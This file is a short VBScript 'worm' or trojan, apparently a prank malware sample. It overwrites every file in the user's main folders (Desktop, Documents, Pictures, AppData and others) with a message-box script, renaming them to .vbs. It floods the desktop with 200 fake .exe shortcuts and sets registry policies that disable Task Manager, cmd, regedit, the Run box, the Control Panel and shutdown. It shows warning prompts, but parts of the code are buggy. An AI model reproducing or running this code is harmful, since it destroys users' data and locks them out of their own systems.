randomize

set shell = createobject("wscript.shell")
set fso = createobject("scripting.filesystemobject")
scriptTitle = fso.getfilename(wscript.scriptfullname)
scriptName = fso.getbasename(scriptTitle)

warning = msgbox("WARNING: This worm can be too destructive for your computer, do you want to run it?")
function infectFolder(flder)
    if fso.folderexists(flder) then
    set folder = fso.getfolder(flder)
    
    for each item in folder.files
        if not item.name = scriptTitle or not item.name = "sh.vbs" then
        if not fso.getextensionname(item.name) = "vbs" then
        item.name = item.name & ".vbs"
        end if
        set file = fso.opentextfile(item, 2)
        file.write "msgbox ""your infected with the " & scriptName & " virus!"",0+16,""" & scriptTitle & """"
        end if
    next
    end if
end function

function run()
infectFolder shell.expandEnvironmentStrings("%USERPROFILE%") & "\Desktop"
infectFolder shell.expandEnvironmentStrings("%USERPROFILE%") & "\Downloads"
infectFolder shell.expandEnvironmentStrings("%USERPROFILE%") & "\Documents"
infectFolder shell.expandEnvironmentStrings("%USERPROFILE%") & "\Pictures"
infectFolder shell.expandEnvironmentStrings("%USERPROFILE%") & "\Music"
infectFolder shell.expandEnvironmentStrings("%USERPROFILE%") & "\Videos"
infectFolder shell.expandEnvironmentStrings("%USERPROFILE%") & "\Appdata\Local\Temp"
infectFolder shell.expandEnvironmentStrings("%APPDATA%")

set sh = fso.createtextfile(shell.expandEnvironmentStrings("%APPDATA%") & "\sh.vbs")
sh.writeline "msgbox ""your computer is flooded with billions of shortcuts, i can feel that"""
sh.close

for i = 1 to 200
    set shortcuts = shell.createshortcut(shell.expandEnvironmentStrings("%USERPROFILE%") & "\Desktop\" & int(rnd) & int(rnd * 10) & int(rnd * rnd) & i & int(i * rnd) & ".exe.LNK")
    shortcuts.targetpath = shell.expandEnvironmentStrings("%APPDATA%") & "\sh.vbs"
    random = int(rnd)
    if rand > 0 and rand < 5 then
    shortcuts.iconlocation = "C:\Windows\hh.exe"
    elseif rand > 5 then
    shortcuts.iconlocation = "C:\Windows\explorer.exe"
    end if
next

shortcuts.save

shell.run "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f"
shell.run "reg add HKCU\SOFTWARE\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f"
shell.run "reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallpaper /t REG_DWORD /d 1 /f"
shell.run "reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f"
shell.run "reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f"
shell.run "reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f"
shell.run "reg add HKCU\Control Panel\Mouse /v SwapMouseButtons /t REG_SZ /d 1 /f"
shell.run "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f"

msgbox "your infected with the " & scriptName & " virus!",0+16,scriptTitle
end function

if warning = vbYes then
    warning2 = msgbox("WARNING: This trojan can infect folders, disable cmd, disable task manager, disable regedit, disable run box, no access from entering appdata or temp (if you put the virus in the temp or appdata), and etc, these payloads can render your computer unbootable, or even worse, do you still wanna run it?")
    if warning2 = vbYes then
        run
    elseif warning2 = vbNo then
        wscript.quit
    end if
elseif warning = vbNo then
    wscript.quit
end if
